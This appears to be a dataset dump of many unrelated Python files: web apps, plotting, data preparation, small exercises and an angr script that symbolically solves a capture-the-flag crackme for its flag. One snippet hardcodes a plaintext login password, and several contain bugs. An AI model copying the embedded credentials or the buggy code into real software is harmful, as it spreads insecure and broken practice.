text stringlengths 38 1.54M |
|---|
"""Entry-point for the Celery application."""
from .factory import create_worker_app, celery_app
app = create_worker_app()
# celery_app.conf.result_backend = 'file:///tmp/foo'
# celery_app.conf.broker_url = 'memory://localhost/'
app.app_context().push() |
import angr
import logging
import IPython
fail = 0x401180
find = 0x000000000001179 + 0x400000
main = 0x000000000001080 + 0x400000
p = angr.Project('./FUNFUN', load_options={'auto_load_libs': False})
init = p.factory.blank_state(addr=main)
for i in range(400):
tmp = init.posix.files[0].read_from(1)
init.se.add(tmp >= 0x20)
init.se.add(tmp <= 0x7f)
init.posix.files[0].seek(0)
init.posix.files[0].length = 14
sm = p.factory.simgr(init)
angr.manager.l.setLevel(logging.DEBUG)
ex = sm.explore(find=find, avoid = fail)
final = ex.found[0]
flag = final.posix.dumps(1)
print("Flag: {0}".format(final.posix.dumps(1)))
IPython.embed()
|
nums = []
def findLengthOfLCIS(nums):
if not nums:
return 0
d = {}
count = 0
n = 0
for n in range(0,len(nums)-1):
if nums[n] < nums[n+1]:
count += 1
else:
d[count+1]=nums[n-count:n+1]
count = 0
d[count+1]=nums[n+1-count:n+2]
return max(d.keys())
print(findLengthOfLCIS(nums))
'''
def findLengthOfLCIS(self, nums):
if not nums:
return 0
count = 1
cur = 1
for i in range(1, len(nums)):
if nums[i] > nums[i-1]:
cur += 1
else:
cur = 1
if cur > count:
count = cur
return count
'''
|
from .profitcalc_nocomments import assets, rent_savings
from .vars_module import translate, vars_range
import copy
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from io import BytesIO
from base64 import b64encode
'''
I will now build a function that receives a parameter name, parameter range for x axis, x axis label,
return graph of assets value on y axis
May want to add plot type
Have Problems with parameters: rent growth, house price growth, mortgage interest
'''
def build_graph(vars: dict, lan: str, parameter: str, param_range: list):
en = True if lan == 'en' else False
vars = copy.deepcopy(vars)
param_range_len = len(param_range)
# y1 = np.empty(param_range_len)
# y2 = np.empty(param_range_len)
y1 = [0] * param_range_len
y2 = [0] * param_range_len
for i in range(param_range_len):
#print(parameter, param_range[i])
vars[parameter] = param_range[i]
y1[i] = assets(vars)
y2[i] = rent_savings(vars)
plt.plot(param_range, y1, label=('Purchase House' if en else translate('Purchase House')), color='#00766c')
plt.plot(param_range, y2, label=('Rent For Life' if en else translate('Rent For Life')), color='#64d8cb')
plt.legend(loc='upper left')
plt.xlabel(parameter if en else translate(parameter))
plt.ylabel('Assets Value (₪)' if en else translate('Assets Value (₪)'))
#plt.savefig("assets_over_time.png")
# plt.show()
image_bytes = BytesIO()
plt.savefig(image_bytes, format= 'png')
# image_bytes.seek(0)
plt.clf()
# plt.close()
del vars
b64_encoding = b64encode(image_bytes.getvalue()).decode()
return b64_encoding
'''
I will now build a function that iterates through all the vars and saves a graph showing the change of assets value,
if we change a single variable throughout a range
'''
'''
I will now edit build_all_graphs, and build_graph to return a list of base64 encodings of each graph it generates
'''
def build_all_graphs(vars, lan):
# encoded_images_lst = [None] * len(vars_range)
encoded_images_dict = dict()
i = 0
for var_label in vars_range:
encoded_images_dict[var_label] = build_graph(vars, lan, var_label, vars_range[var_label])
# build_graph(vars, lan, var_label, vars_range[var_label])
i += 1
# print (encoded_images_dict.keys())
return encoded_images_dict
#vars['Start Amount'] = 1e6
#build_all_graphs(vars)
#build_graph(vars, 'Mortgage Interest', vars_module.vars_range['Mortgage Interest'])
# def build_test_graph(vars, lan):
# return {'House Price' : build_graph(vars, lan, 'House Price', vars_range['House Price'])}
# test_vars={
# "Years Until Retirement" : 50, # need to use
# "Years To Save" : 0, # it seems that 0 is optimal for everyone
# "Start Amount" : 50000, # seems to have less effect on final asset value
# "Gross Salary" : 50000,
# "Years To Future" : 50, # number of years ahead to calcuate/compare assets value
# # deciding changeable parameters
# "Rent" : 5000, # monthly rent fee
# "Rent Growth" : 0.05, # 3% annual rent rate growth, influences asset value less
# "House Price" : 5e6,
# "House Price Growth" : 0.05, # 5% annual purchase fee growth
# "Long Term Savings Return" : 0.05,
# # (annual), seems not to effect asset value very much
# "Mortgage Interest" : 0.05,
# # percentage of net income to go to rent + extra savings, or % of net to go to mortgage
# "Savings Rate From Net" : 0.5,
# # less sensitive but also important parameters
# # short_savings_return = 0.05 # 5% annual rate of return from savings
# "Salary Growth" : 0.05 # annual salary growth
# }
# if __name__ == 'main':
# build_test_graph(test_vars, 'en')
# build_all_graphs(test_vars, 'en') |
from Abstract.AActionSubclasses.ActionLine import ActionLine
import os,json
from TrainerPredictor import CTrainerPredictor
class CProcessSolutions(ActionLine):
def __init__(self,chatbot):
"""
Constructor de la Clase.
:param chatbot: Es el ChatBot que tiene como acción la instancia de esta clase.
"""
self.chatbot = chatbot
def exec(self,):
"""
Método que procesa los errores a resolver.
:return: void
"""
if self.chatbot.nameChatbotToSolve == '':
self.chatbot.output.exec('No hay un chatbot seleccionado.')
elif not (self.chatbot.nameChatbotToSolve == '') and self.chatbot.dictResolvedErrors == {}:
self.chatbot.output.exec('El ChatBot "'+self.chatbot.nameChatbotToSolve+'" no tiene soluciones que aplicar.')
else:
with open(self.chatbot.pathJSONChatbotToSolve, 'r+',encoding='utf-8') as f:
data = json.load(f) # carga los datos del json
intents = data[self.chatbot.nameChatbotToSolve] # selecciona las intenciones del chatbot
for sentence,intent in self.chatbot.dictResolvedErrors.items():
for i in intents:
if i['tag'] == intent: # encuentra la intención donde añadirá la sentencia a resolver
i['patterns'].append(sentence)
break # para no seguir buscando
f.seek(0)
json.dump(data, f, ensure_ascii=False,indent=4) # se vuelve a cargar el json editado
f.truncate()
listSolvedErros = []
with open(self.chatbot.pathErrorFileChatbotToSolve, 'r+', encoding='utf-8') as f:
json_data = json.load(f) # se carga los errores del fichero de errores
copyResolvedErrores = self.chatbot.dictResolvedErrors.copy()# copia para el recorrido de errores resueltos
for k, v in copyResolvedErrores.items():
listSolvedErros.append(k) # se guarda en una lista solo las sentencias resueltas
del (json_data[k]) # se elimina del json las sentencias resueltas
del (self.chatbot.dictResolvedErrors[k]) # se elimina las sentencias del diccionario de errores
result = ", ".join(str(value) for value in listSolvedErros) # se genera un string para el aviso
f.seek(0)
json.dump(json_data, f, ensure_ascii=False, indent=4) # se guarda los cambios en el json
f.truncate()
self.rebuildModel() # reconstruye el modelo
self.chatbot.output.exec('Se han resuelto los errores: '+result)# muestra el mensaje
def rebuildModel(self):
"""
Reconstruye el modelo
:return: void
"""
if not (os.path.exists(self.chatbot.pathJSONChatbotToSolve)):
self.chatbot.output.exec('No existe el fichero JSON "'+self.chatbot.pathJSONChatbotToSolve+'".')
else:
self.chatbot.output.exec('Generando el modelo para el ChatBot "'+self.chatbot.nameTransformedChatbotToSolve+'"...')
TrainerAndPredictor = CTrainerPredictor()
TrainerAndPredictor.readJSON(self.chatbot.pathJSONChatbotToSolve,self.chatbot.nameChatbotToSolve) # lee el json
TrainerAndPredictor.createElementsToModel() # crea elementos para el modelo
pathModelChatbotToSolve = os.path.join(os.path.sep,self.chatbot.generalPathChatbotToSolve,self.chatbot.nameTransformedChatbotToSolve) # ruta donde se guardará el modelo
value = TrainerAndPredictor.trainingModel(pathModelChatbotToSolve) # valor si el modelo se ha generado correctamente
if not value:
self.chatbot.output.exec('No se ha podido generar el Modelo porque se necesita más de 1 Intención con Patrones creados.')
else:
TrainerAndPredictor.doPickle() # guarda el modelo
self.chatbot.output.exec('El modelo se ha generado correctamente')
|
#!/usr/bin/python3
#
# read a bunch of source light fields and write out
# training data for our autoencoder in useful chunks
#
# pre-preparation is necessary as the training data
# will be fed to the trainer in random order, and keeping
# several light fields in memory is impractical.
#
# WARNING: store data on an SSD drive, otherwise randomly
# assembing a bunch of patches for training will
# take ages.
#
# (c) Bastian Goldluecke, Uni Konstanz
# bastian.goldluecke@uni.kn
# License: Creative Commons CC BY-SA 4.0
#
from queue import Queue
import time
import code
import os
import sys
import h5py
import numpy as np
# python tools for our lf database
import file_io
# additional light field tools
import lf_tools
# OUTPUT CONFIGURATION
# patch size. patches of this size will be extracted and stored
# must remain fixed, hard-coded in NN
px = 96 #48
py = 96 #48
# number of views in H/V/ direction
# input data must match this.
nviews = 9
# block step size. this is only 16, as we keep only the center 16x16 block
# of each decoded patch (reason: reconstruction quality will probably strongly
# degrade towards the boundaries).
#
# TODO: test whether the block step can be decreased during decoding for speedup.
#
sx = 32 #16
sy = 32 #16
# output file to write to
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# !!!!! careful: overwrite mode !!!!!
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# previous training data will be erased.
training_data_dir = "D:\\Python\\DataRead\\trainData\\"
training_data_filename = 'lf_patch_intrinsic3_diffuse_96.hdf5'
file = h5py.File( training_data_dir + training_data_filename, 'w' )
#
#data_folders = ( ( "training", "boxes" ), )
# data_folders = data_folders_base + data_folders_add
data_source = "E:\\CNN_data\\diffuse\\3"
data_folders = os.listdir(data_source)
dset_v = file.create_dataset( 'stacks_v', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
dset_h = file.create_dataset( 'stacks_h', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
# dataset for corresponding depth patches
dset_depth = file.create_dataset( 'depth', ( py,px, 1 ),
chunks = ( py,px, 1 ),
maxshape = ( py,px, None ) )
# dataset for corresponding albedo patches
dset_albedo_v = file.create_dataset( 'albedo_v', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
dset_albedo_h = file.create_dataset( 'albedo_h', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
# dataset for corresponding shading patches
dset_sh_v = file.create_dataset( 'sh_v', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
dset_sh_h = file.create_dataset( 'sh_h', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
# dataset for corresponding specular patches
dset_specular_v = file.create_dataset( 'specular_v', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
dset_specular_h = file.create_dataset( 'specular_h', ( 9, py,px, 3, 1 ),
chunks = ( 9, py,px, 3, 1 ),
maxshape = ( 9, py,px, 3, None ) )
#
# loop over all datasets, write out each dataset in patches
# to feed to autoencoder in random order
#
# data_folders = {data_folders[1],}
index = 0
for lf_name in data_folders:
data_folder = os.path.join(data_source,lf_name)
# read diffuse color
LF_dc = file_io.read_lightfield_intrinsic(data_folder, 'dc')
# read diffuse direct
LF_dd = file_io.read_lightfield_intrinsic(data_folder, 'dd')
#read diffuse indirect
LF_di = file_io.read_lightfield_intrinsic(data_folder, 'di')
# read glossy color
LF_gc = file_io.read_lightfield_intrinsic(data_folder, 'gc')
# read glossy direct
LF_gd = file_io.read_lightfield_intrinsic(data_folder, 'gd')
#read glossy indirect
LF_gi = file_io.read_lightfield_intrinsic(data_folder, 'gi')
# albedo LF
LF_albedo = LF_dc
# shading LF
LF_sh = np.add(LF_dd, LF_di)
# glossy LF
LF_specular = np.multiply(LF_gc, np.add(LF_gd, LF_gi))*0
# input LF
LF = np.add(np.multiply(LF_dc, LF_sh),LF_specular)
disp = file_io.read_disparity( data_folder )
disp_gt = np.array( disp[0] )
disp_gt = np.flip( disp_gt,0 )
# maybe we need those, probably not.
param_dict = file_io.read_parameters(data_folder)
# write out one individual light field
# block count
cx = np.int32( ( LF.shape[3] - px) / sx ) + 1
cy = np.int32( ( LF.shape[2] - py) / sy ) + 1
for by in np.arange( 0, cy ):
sys.stdout.write( '.' )
sys.stdout.flush()
for bx in np.arange( 0, cx ):
x = bx * sx
y = by * sx
# extract data
(stack_v, stack_h) = lf_tools.epi_stacks(LF, y, x, py, px)
# make sure the direction of the view shift is the first spatial dimension
stack_h = np.transpose(stack_h, (0, 2, 1, 3))
(stack_v_albedo, stack_h_albedo) = lf_tools.epi_stacks( LF_albedo, y, x, py, px )
# make sure the direction of the view shift is the first spatial dimension
stack_h_albedo = np.transpose( stack_h_albedo, (0, 2, 1, 3) )
(stack_v_sh, stack_h_sh) = lf_tools.epi_stacks( LF_sh, y, x, py, px )
# make sure the direction of the view shift is the first spatial dimension
stack_h_sh = np.transpose( stack_h_sh, (0, 2, 1, 3) )
(stack_v_specular, stack_h_specular) = lf_tools.epi_stacks(LF_specular, y, x, py, px)
stack_h_specular = np.transpose(stack_h_specular, (0, 2, 1, 3))
depth = disp_gt[ y:y+py, x:x+px ]
# write to respective HDF5 datasets
# input
dset_v.resize(index + 1, 4)
dset_v[:, :, :, :, index] = stack_v
dset_h.resize(index + 1, 4)
dset_h[:, :, :, :, index] = stack_h
# albedo
dset_albedo_v.resize(index + 1, 4)
dset_albedo_v[:, :, :, :, index] = stack_v_albedo
dset_albedo_h.resize(index + 1, 4)
dset_albedo_h[:, :, :, :, index] = stack_h_albedo
# shading
dset_sh_v.resize(index + 1, 4)
dset_sh_v[:, :, :, :, index] = stack_v_sh
dset_sh_h.resize(index + 1, 4)
dset_sh_h[:, :, :, :, index] = stack_h_sh
# specularity
dset_specular_v.resize(index + 1, 4)
dset_specular_v[:, :, :, :, index] = stack_v_specular
dset_specular_h.resize(index + 1, 4)
dset_specular_h[:, :, :, :, index] = stack_h_specular
dset_depth.resize( index+1, 2 )
dset_depth[ :,:, index ] = depth
# next patch
index = index + 1
# next dataset
print(' done.')
|
import requests
import json
host = 'localhost'
auth = ('Samir', 'Ge0ne!RDS')
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
params = {'any': 'Mr. Jakob Steiner',
'type': 'dataset',
'_content_type': 'json',
'fast': 'index',
'from': 1,
'resultType': 'details',
'to': 100}
api = 'http://localhost:8080/geonetwork3102/srv/eng/q?'
search_request = requests.get(api, headers=headers, params=params)
metadata_result = json.loads(search_request.text)
# print(type(metadata_result['metadata']))
print(metadata_result)
count = 0
# loop through multiple metadata
# for single metadata it doesn't work
for found_metadata in metadata_result['metadata']:
print(found_metadata[title])
# for meta_data in metadata_result['metadata']:
#
# if 'image' not in meta_data:
# print('*** Thumbnail Not Found ***', '\n')
# continue
#
# if len(meta_data['image'][0]) > 60:
# print(meta_data['title'])
# print(meta_data['geonet:info']['id'], meta_data['geonet:info']['uuid'])
# print(meta_data['abstract'])
# print(meta_data['image'][0], len(meta_data['image'][0]), '\n')
# count += 1
#
# print('Total Metadata:', count)
|
#!/usr/bin/env python
import sys
from os import path
sys.path.append(path.dirname(sys.path[0]) + '\\logparser\\Slop')
import Slop
input_dir = '../logs/HDFS/' # The input directory of log file
output_dir = 'Slop_result/' # The output directory of parsing results
log_file = 'HDFS_2k.log' # The input log file name
log_format = '<Date> <Time> <Pid> <Level> <Component>:<Content>' # HDFS log format
tau = 0.5 # Message type threshold (default: 0.5)
regex = [] # Regular expression list for optional preprocessing (default: [])
parser = Slop.LogParser(logname=log_file, indir=input_dir, outdir=output_dir, log_format=log_format, tau=tau, rex=regex)
message = log_file
parser.parse_by_Spark(message)
#parser.parse_by_streaming(message,True)
#parser.outputResult()
|
import krpc
import time
conn = krpc.connect(
name='Connection Test',
address='192.168.86.60',
rpc_port=50000, stream_port=50001)
vessel = conn.space_center.active_vessel
vessel.control.activate_next_stage()
vessel.auto_pilot.engage()
vessel.auto_pilot.target_pitch_and_heading(90, 90)
while True:
flight_info = vessel.flight()
print(flight_info.mean_altitude)
time.sleep(1) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import re
import calendar
import statistics
import pandas as pd
import seaborn
import pathlib
import matplotlib.pyplot as plt
from xml.etree import ElementTree
from jinja2 import Environment, PackageLoader, select_autoescape
from activity import Activity, create_activity, parse_activities_csv, extract_activities
import crunch
import single_plot
import multi_plot
def generate_single_report(arguments):
environment = Environment(
loader=PackageLoader("cycloanalyzer", "template"),
autoescape=select_autoescape(["html", "xml"]))
environment.filters["format_number"] = format_number
template = environment.get_template("single-report.html")
activities = extract_activities(arguments.input, imperial=True, type_filter=None)
selected_activity = crunch.select_activity(activities, iso_date=arguments.date)
arguments.show = False
single_plot.speed_over_time(arguments)
single_plot.elevation_over_time(arguments)
latlong_svg = None
with open(os.path.join("plot", "latlong.svg"), "r") as latlong_file:
latlong_svg = latlong_file.read()
speed_svg = None
with open(os.path.join("plot", "speed.svg"), "r") as speed_file:
speed_svg = speed_file.read()
elevation_svg = None
with open(os.path.join("plot", "elevation.svg"), "r") as elevation_file:
elevation_svg = elevation_file.read()
model = {
"name": selected_activity.name,
"date": selected_activity.date,
"top_speed": selected_activity.max_speed,
"average_speed": selected_activity.average_speed,
"elevation_gain": selected_activity.elevation_gain,
"moving_time": selected_activity.moving_time / 60,
"distance": selected_activity.distance,
"average_grade": selected_activity.average_grade,
"latlong_plot": latlong_svg,
"speed_plot": speed_svg,
"elevation_plot": elevation_svg
}
pathlib.Path("report").mkdir(exist_ok=True)
with open(os.path.join("report", "single-report.html"), "w") as report_file:
report_file.write(template.render(model))
def generate_aggregate_report(arguments):
environment = Environment(
loader=PackageLoader("cycloanalyzer", "template"),
autoescape=select_autoescape(["html", "xml"])
)
environment.filters["format_number"] = format_number
environment.filters["inject_class"] = inject_class
template = environment.get_template("multi-report.html")
rides = extract_activities(arguments.input, imperial=True, type_filter="Ride")
first_datetime = rides[0].date
last_datetime = rides[-1].date
weekly_metrics = crunch.crunch_weekly_metrics(rides)
ytd_metrics = crunch.crunch_year_to_date_metrics(rides)
total_metrics = crunch.crunch_total_metrics(rides)
arguments.show = False
multi_plot.heatmap(arguments)
multi_plot.average_distance_over_weekday(arguments)
multi_plot.distance_over_time(arguments)
multi_plot.distance_histogram(arguments)
multi_plot.moving_time_histogram(arguments)
heatmap_svg = remove_svg_dimensions(load_plot("heatmap.svg"))
adow_svg = remove_svg_dimensions(load_plot("adow.svg"))
dot_svg = remove_svg_dimensions(load_plot("dot.svg"))
dhist_svg = remove_svg_dimensions(load_plot("dhist.svg"))
thist_svg = remove_svg_dimensions(load_plot("thist.svg"))
model = {
"first_datetime": first_datetime,
"last_datetime": last_datetime,
"total_ride_count": total_metrics[0],
"total_ride_time": total_metrics[1],
"total_ride_distance": total_metrics[2],
"total_ride_elevation": total_metrics[3],
"ytd_ride_count": ytd_metrics[0],
"ytd_ride_time": ytd_metrics[1],
"ytd_ride_distance": ytd_metrics[2],
"ytd_ride_elevation": ytd_metrics[3],
"weekly_ride_average": weekly_metrics[0],
"weekly_time_average": weekly_metrics[1],
"weekly_distance_average": weekly_metrics[2],
"weekly_elevation_average": weekly_metrics[3],
"heatmap_svg": heatmap_svg,
"adow_plot": adow_svg,
"dot_plot": dot_svg,
"dhist_plot": dhist_svg,
"thist_plot": thist_svg
}
pathlib.Path("report").mkdir(exist_ok=True)
with open(os.path.join("report", "multi-report.html"), "w") as report_file:
report_file.write(template.render(model))
def load_plot(plot_name):
"""Load an svg from the plot directory, given a filename."""
svg_data = None
with open(os.path.join("plot", plot_name), "r") as svg_file:
svg_data = svg_file.read()
return svg_data
def remove_svg_dimensions(svg_data):
"""Remove explicit height and width attributes from an svg, if present."""
desired_index = 0
svg_lines = svg_data.split("\n")
for index, line in enumerate(svg_lines):
if "<svg" in line:
desired_index = index
break
line = svg_lines[desired_index]
line = re.sub("height=\".*?\" ", "", line)
line = re.sub("width=\".*?\" ", "", line)
svg_lines[desired_index] = line
svg_data = "\n".join(svg_lines)
return svg_data
def format_number(value):
return f"{round(value, 2):n}"
def inject_class(value, class_name):
"""Given raw html, attach the provided class to the first element.
This method assumes a class does not already exist on the element.
"""
desired_index = 0
svg_lines = value.split("\n")
for index, line in enumerate(svg_lines):
if "<svg" in line:
desired_index = index
break
line = svg_lines[desired_index]
line = "<svg class=\"" + class_name + "\" " + line[5:]
svg_lines[desired_index] = line
value = "\n".join(svg_lines)
return value
|
def setup():
size(480, 120)
stroke(0, 102)
def draw():
weight = dist(mouseX, mouseY, pmouseX, pmouseY)
strokeWeight(weight)
line(mouseX, mouseY, pmouseX, pmouseY)
saveFrame("frames/SaveExample-####.png")
|
from DB import *
def main():
VENOM = DB
host = input("Enter the target \r\n ")
VENOM.HTML(VENOM, host)
if __name__ == "__main__":
main()
|
from tornado import gen
import random
import string
from .lib.basescraper import BaseScraper
def random_string(min_size, max_size):
length = random.randint(min_size, max_size)
chars = string.ascii_letters
return "".join(random.choice(chars) for _ in range(length))
class SampleScraper(BaseScraper):
name = 'samplescraper'
@gen.coroutine
def scrape(self, user_data):
num_items = random.randint(50, 150)
texts = [
{'text': random_string(1, 120)}
for _ in range(num_items)
]
return texts
|
#Die Funktionion sind in eigenen Packages gespeichert
#über die main.py wird die Flask-App geladen und weitergeleitet
from flaskblog import app
if __name__ == '__main__':
app.run(debug=True) |
core = cutter.core()
highlighter = core.getBBHighlighter()
highlighter.highlight(0x00404b66, 0xff0000) |
"""
Napisati kod koji za date katete a i b (a < b) pravouglog trougla racuna povrinu
i zapreminu tijela koje se dobija rotacijom trougla oko manje katete.
"""
import math
a = 5
b = 7
c = math.sqrt(a*a + b*b)
#print(c)
baza = b * b * math.pi
#print(baza)
tijelo = c * b * math.pi
#print(tijelo)
povrsina = baza + tijelo
print('POVRSINA KUPE IZNOSI:' , povrsina)
zapremina_kupe = (baza*a)/3
print('ZAPREMINA KUPE IZNOSI: ', zapremina_kupe)
|
from django.test import TestCase
from django import forms as django_forms
import forms
class FieldsetRenderTestCase(TestCase):
def _test_form(self):
class TestForm(django_forms.Form, forms.FieldsetMixin):
test_field1 = django_forms.CharField()
test_field2 = django_forms.CharField()
test_field3 = django_forms.CharField()
fieldsets = (
(u'Fieldset1', {
'description': u'Test Description',
'fields': ('test_field1',),
}),
(u'Fieldset2', {
'fields': ('test_field2', 'test_field3'),
}),
)
def clean_test_field2(self):
raise django_forms.ValidationError(
[u'Test Error - Field Level - 1',
u'Test Error - Field Level - 2'])
def clean(self):
raise django_forms.ValidationError(u'Test Error - Top Level')
return TestForm
def testFieldsetRender(self):
RESPONSE = u"""<toplevelerrors><ul class="errorlist"><li>Test Error - Top Level</li></ul></toplevelerrors>
<fieldset>
<name>Fieldset1</name><help>Test Description</help>
<row><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="test_field1" id="id_test_field1" /></row>
</fieldset>
<fieldset>
<name>Fieldset2</name>
<row><ul class="errorlist"><li>Test Error - Field Level - 1</li><li>Test Error - Field Level - 2</li></ul><input type="text" name="test_field2" value="Test Value" id="id_test_field2" /></row>
<row><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="test_field3" id="id_test_field3" /></row>
</fieldset>"""
form = self._test_form()(data={'test_field2': u'Test Value'})
self.assertEqual(form.is_valid(), False)
self.assertEqual(
form._html_fieldset_output(
'<fieldset>\n<name>%(name)s</name>' \
'%(description)s\n%(fields)s\n</fieldset>',
'<row>%(errors)s%(field)s%(help_text)s</row>',
'<toplevelerrors>%s</toplevelerrors>',
'',
'<help>%s</help>',
False),
RESPONSE
)
|
import argparse
import boto3
"""Helper module to assist in AWS deployments"""
def get_lambda_client(
aws_access_key_id: str, aws_secret_access_key: str, aws_region: str
) -> boto3.client:
return boto3.client(
"lambda",
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
region_name=aws_region,
)
def get_arg_parser():
"""Parser to parse out AWS Secrets from command line arguments"""
parser = argparse.ArgumentParser()
parser.add_argument("--AWS_ACCESS_KEY_ID", help="AWS Access Key ID", type=str)
parser.add_argument(
"--AWS_SECRET_ACCESS_KEY", help="AWS Secret Access Key", type=str
)
parser.add_argument("--AWS_REGION", help="AWS Region", type=str)
return parser
|
from classes import Dungeon, Player, Creature
def auto_map(level, key, w, h):
x = 0
y = 0
for row in key:
for col in row:
if x + 1 < w:
if key[x][y] == 1:
if key[x+1][y] == 1:
level.layout[x][y].north = True
if x- 1 > 0:
if key[x][y] == 1:
if key[x-1][y] == 1:
level.layout[x][y].south = True
if y + 1 < h:
if key[x][y] == 1:
if key[x][y+1] == 1:
level.layout[x][y].east = True
if y - 1 > 0:
if key[x][y] == 1:
if key[x][y-1] == 1:
level.layout[x][y].west == True
y += 1
y = 0
x += 1
return level
def test():
first_map = [
[0,1,0,1,1,1,1,0,1],
[0,1,0,0,0,0,1,1,1],
[0,1,1,1,1,1,1,1,1],
[0,1,0,0,0,0,1,0,1],
[0,0,1,1,1,1,1,0,1],
[0,1,1,0,0,0,1,0,1],
[1,1,0,1,1,1,0,0,1],
[0,1,0,1,0,1,0,0,1],
[0,1,1,1,0,1,1,1,1],
]
x = Dungeon(8,8)
y = auto_map(x,first_map,8,8)
player = Player('seth')
creature = Creature()
y.place('p', player, 4, 4)
y.place('c', creature, 4, 5)
y.show_map() |
#!/usr/bin/python
#from difflib import *
from sys import stdin
#from math import sqrt
def input():
list = []
#list = stdin.read().split()
for item in stdin:
if item == "\n":
continue
list.append(float(item))
number = list.pop(0)
return number, list
def gapInList(dataList):
x = []
"""
# gaps between items that are next to each other
for item_1, item_2 in zip(b[:-1], b[1:]): # [ ( item1 , item1+1), ( item2 , item2+1),... ]
x.append(abs(item_2 - item_1))
"""
# all gaps between item which are not necessary next to each other
for item_1 in dataList:
for item_2 in dataList:
x.append(abs(item_2 - item_1))
return sum(x)/len(x)
def gapTargetNumber(targetNumber, dataList):
x = []
for item_1 in dataList:
x.append(abs(targetNumber - item_1))
return sum(x)/len(x)
def compare(targetNumber, dataList):
x = []
for value in dataList:
#x.append(abs(value - targetNumber))
x.append(abs(howSimilar(targetNumber, value)))
"""
#----- check outliers
for i in x:
if gap(x)
#-----
"""
#print "-"*20
return sum(x)/len(x)
def howSimilar(value_1, value_2):
# https://stackoverflow.com/questions/26109959/get-the-similarity-of-two-numbers-with-python
if value_1 > value_2:
value_1, value_2 = value_2, value_1
"""
a = value_1 * value_1
b = value_2 * value_2
x = a / sqrt(a * b)
"""
x = abs(float(value_1)/float(value_2))
#print x
return x
if __name__ == "__main__":
number, list = input()
print "Targeted number: %s" % number
print "There is a similarity of: %s %%" % (compare(number,list)*100)
print "-"*30
x = gapTargetNumber(number,list)
print "Average gap between targeted number and list: %s" % x
y = gapInList(list)
print "Average gap between item in list: %s" % y
print "The gaps similarity is: %s %%" % (howSimilar(x,y)*100)
|
from django.db import models
from accounts.models.auth_user import AuthUser
from managers.base_manager import BaseManager
class User(models.Model):
auth_user = models.OneToOneField(
AuthUser,
on_delete=models.CASCADE,
related_name="additional_data",
primary_key=True,
)
date_birth = models.DateField()
address = models.CharField(
max_length=50
)
objects = BaseManager()
@property
def username(self):
return self.auth_user.username
def __str__(self):
return self.username
|
import argparse
import pandas as pd
from textlib.whatsapp import helper
from textlib.whatsapp import general
import emoji as em
from textlib.whatsapp import testhelper
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import TfidfVectorizer
from xgboost import XGBClassifier
from sklearn import model_selection, preprocessing, linear_model, naive_bayes, metrics, svm
from sklearn.model_selection import train_test_split
import numpy as np
def parse_arguments() -> argparse.Namespace:
""" Parse command line inputs """
parser = argparse.ArgumentParser(description='Character')
parser.add_argument('--trainfile', help='The name of the whatsapp export file', required=True)
parser.add_argument('--testfile', help='The name of the test whatsapp text file with only texts', required=True)
args = parser.parse_args()
return args
def main():
args = parse_arguments()
# Load data
df = helper.import_data(f'{args.trainfile}')
df = helper.preprocess_data(df)
temp=df['Message_Clean']
l=[]
for i in temp:
x=''
for c in i:
if c in em.UNICODE_EMOJI:
x=x+c
l.append(x)
df['emojis']=l
df['Message_Only_Text']=df['Message_Only_Text']+df['emojis']
dftest= testhelper.import_data(f'{args.testfile}')
cc=[]
for i in df['Message_Only_Text']:
cc.append(i)
corpus=cc
y = df['User']
labelencoder = LabelEncoder()
y = labelencoder.fit_transform(y)
tes=dftest['Message_Only_Text']+dftest['emojis']
test=[tes]
corpus.append(test[0])
TV=TfidfVectorizer(max_features = 50)
XT = TV.fit_transform(corpus).toarray()
X=XT[:-1]
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size = 0.05)
xx=X.tolist()[-1]
xtest=np.array([xx])
model = XGBClassifier()
model.fit(X_train, y_train)
y_pred = model.predict(xtest)
name=labelencoder.inverse_transform(y_pred)
print (name.tolist()[0])
return
if __name__ == "__main__":
main()
|
from marshmallow import Schema, fields, EXCLUDE, validate
class SuccessSchema(Schema):
result = fields.String()
class BadRequestSchema(Schema):
error = fields.Integer()
class FibNumber(Schema):
N = fields.Integer()
class FibNumbersList(Schema):
fibonacci_sequence = fields.List(fields.Integer())
class GenerateDict(Schema):
total_int = fields.String()
total_deciaml = fields.String()
class BookSchema(Schema):
name = fields.String(required=True, validate=validate.Length(min=5, max=50))
author_id = fields.Integer()
class Meta:
unknown = EXCLUDE
|
from collections import deque
existing_food = int(input())
line = map(int, input().split())
customers = deque(line)
print(max(customers))
is_complete = True
while len(customers) > 0:
order = customers[0]
if order <= existing_food and is_complete:
existing_food -= order
customers.popleft()
else:
print(f"Orders left: {order}", end=" ")
customers.popleft()
is_complete = False
if is_complete:
print("Orders complete")
|
#-*- coding: utf-8 -*-
from scraping import bdd
from flask import Flask, request, jsonify, redirect
from flask_restful import Resource, Api, output_json
from scraping.lib import get_data
class UnicodeApi(Api):
def __init__(self, *args, **kwargs):
super(UnicodeApi, self).__init__(*args, **kwargs)
self.app.config['RESTFUL_JSON'] = {
'ensure_ascii': False
}
self.representations = {
'application/json; charset=utf-8': output_json
}
class ListAPI(Resource):
def get(selt):
return jsonify(bdd.listAPI)
# First selection level
class GameListAPI(Resource):
def get(self):
